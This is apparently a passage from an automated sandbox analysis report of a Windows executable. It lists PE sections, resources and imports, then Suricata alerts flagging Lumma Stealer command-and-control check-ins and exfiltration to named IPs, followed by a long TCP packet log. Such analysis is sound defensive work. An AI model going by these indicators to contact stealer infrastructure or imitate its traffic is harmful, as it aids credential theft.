                                                                                                                                                                      .reloc0x15a0000xfd60x1000b0d05814ea00da63327959615c44f046False0.568359375data5.309946074381747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_ICON0x1002c80x4ce42PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9883726099077302
                                                                                                                                                                      RT_ICON0x14d10c0x68d9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950076375693901
                                                                                                                                                                      RT_ICON0x1539e80x209fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013172075200574
                                                                                                                                                                      RT_ICON0x155a880x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5272579332790887
                                                                                                                                                                      RT_ICON0x1580f00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6261384335154827
                                                                                                                                                                      RT_ICON0x1592180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7978723404255319
                                                                                                                                                                      RT_DIALOG0x1596800x100dataEnglishUnited States0.5234375
                                                                                                                                                                      RT_DIALOG0x1597800x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                      RT_DIALOG0x15989c0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                      RT_GROUP_ICON0x1598fc0x5adataEnglishUnited States0.7888888888888889
                                                                                                                                                                      RT_VERSION0x1599580x2ccdataEnglishUnited States0.4818435754189944
                                                                                                                                                                      RT_MANIFEST0x159c240x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                      Possible Origin

                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-12-24T01:33:55.070414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:33:56.093923+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449742188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:33:56.093923+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:33:57.315963+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:33:58.076932+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449743188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:33:58.076932+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:33:59.453447+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:01.741478+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:04.082295+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:06.375667+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:08.690904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:09.604944+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449748188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:10.828901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:11.616553+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449749188.114.97.6443TCP
                                                                                                                                                                      2024-12-24T01:34:13.058213+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750172.67.169.205443TCP
                                                                                                                                                                      2024-12-24T01:34:18.115128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.84.113443TCP

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 24, 2024 01:33:53.819586992 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:53.819674015 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:53.825090885 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:53.827882051 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:53.827924013 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:55.070333004 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:55.070414066 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:55.074187040 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:55.074206114 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:55.074611902 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:55.118058920 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:55.118122101 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:55.118206978 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.093879938 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.093990088 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.094072104 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.095690966 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.095690966 CET49742443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.095731974 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.095758915 CET44349742188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.101483107 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.101514101 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:56.101604939 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.102461100 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:56.102474928 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.315892935 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.315963030 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.317234993 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.317245960 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.317567110 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:57.318732023 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.318763971 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:57.318811893 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.076922894 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.076982021 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.077030897 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.077048063 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.077460051 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.077527046 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.077534914 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.078310966 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.078360081 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.078366041 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.085298061 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.085350990 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.085357904 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.093523026 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.093580008 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.093590021 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106015921 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106064081 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106070995 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106137037 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106190920 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106239080 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106257915 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.106268883 CET49743443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.106272936 CET44349743188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.238605976 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.238646984 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:58.238709927 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.239480019 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:58.239499092 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.453344107 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.453447104 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.454647064 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.454675913 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.455013037 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.456144094 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.456300020 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.456343889 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:33:59.456445932 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:33:59.456460953 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.437510967 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.437609911 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.437819004 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.437963963 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.438004017 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.499797106 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.499849081 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.499934912 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.500263929 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.500279903 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.741386890 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.741477966 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.742779016 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.742790937 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.743288040 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.744474888 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.744599104 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.744632959 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.606930017 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.607029915 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.607079983 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.616746902 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.616766930 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.868071079 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.868159056 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.868273020 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.868662119 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.868740082 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.082020044 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.082294941 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.083415985 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.083489895 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.083827972 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.084883928 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.085077047 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.085123062 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.085199118 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.085215092 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.057188988 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.057451963 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.057547092 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.057634115 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.057671070 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.158727884 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.158771038 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.158863068 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.159158945 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.159176111 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.375575066 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.375667095 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.376941919 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.376954079 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.377281904 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.378469944 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.378571987 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.378576994 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.426314116 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.426450968 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.426517010 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.426707983 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.426726103 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.471894979 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.471929073 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.472002029 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.472349882 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.472362995 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:08.690772057 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:08.690903902 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:08.696383953 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:08.696407080 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:08.696778059 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:08.697897911 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:08.697999954 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:08.698004961 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:09.604959011 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:09.605196953 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:09.605259895 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:09.605401039 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:09.605420113 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:09.608288050 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:09.608376980 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:09.608491898 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:09.608777046 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:09.608808994 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:10.828795910 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:10.828901052 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:10.830250025 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:10.830279112 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:10.830727100 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:10.831887960 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:10.831933022 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:10.831998110 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.616488934 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.616729021 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.616833925 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:11.616986990 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:11.617033005 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.617063999 CET49749443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:11.617079020 CET44349749188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.836410999 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:11.836456060 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:11.836644888 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:11.836982012 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:11.837013006 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:13.058114052 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:13.058212996 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:13.060060978 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:13.060077906 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:13.060415030 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:13.061541080 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:13.103406906 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.635456085 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.635629892 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.635713100 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:16.635837078 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:16.635854959 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.635871887 CET49750443192.168.2.4172.67.169.205
                                                                                                                                                                      Dec 24, 2024 01:34:16.635879993 CET44349750172.67.169.205192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.882867098 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:16.882970095 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:16.883073092 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:16.883379936 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:16.883415937 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.115008116 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.115128040 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.116683006 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.116715908 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.117125988 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.120423079 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.163355112 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.540556908 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.540693998 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.540754080 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.540783882 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.540896893 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.541042089 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.541055918 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.541101933 CET44349751104.21.84.113192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:18.541163921 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.541192055 CET49751443192.168.2.4104.21.84.113
                                                                                                                                                                      Dec 24, 2024 01:34:18.541203976 CET44349751104.21.84.113192.168.2.4
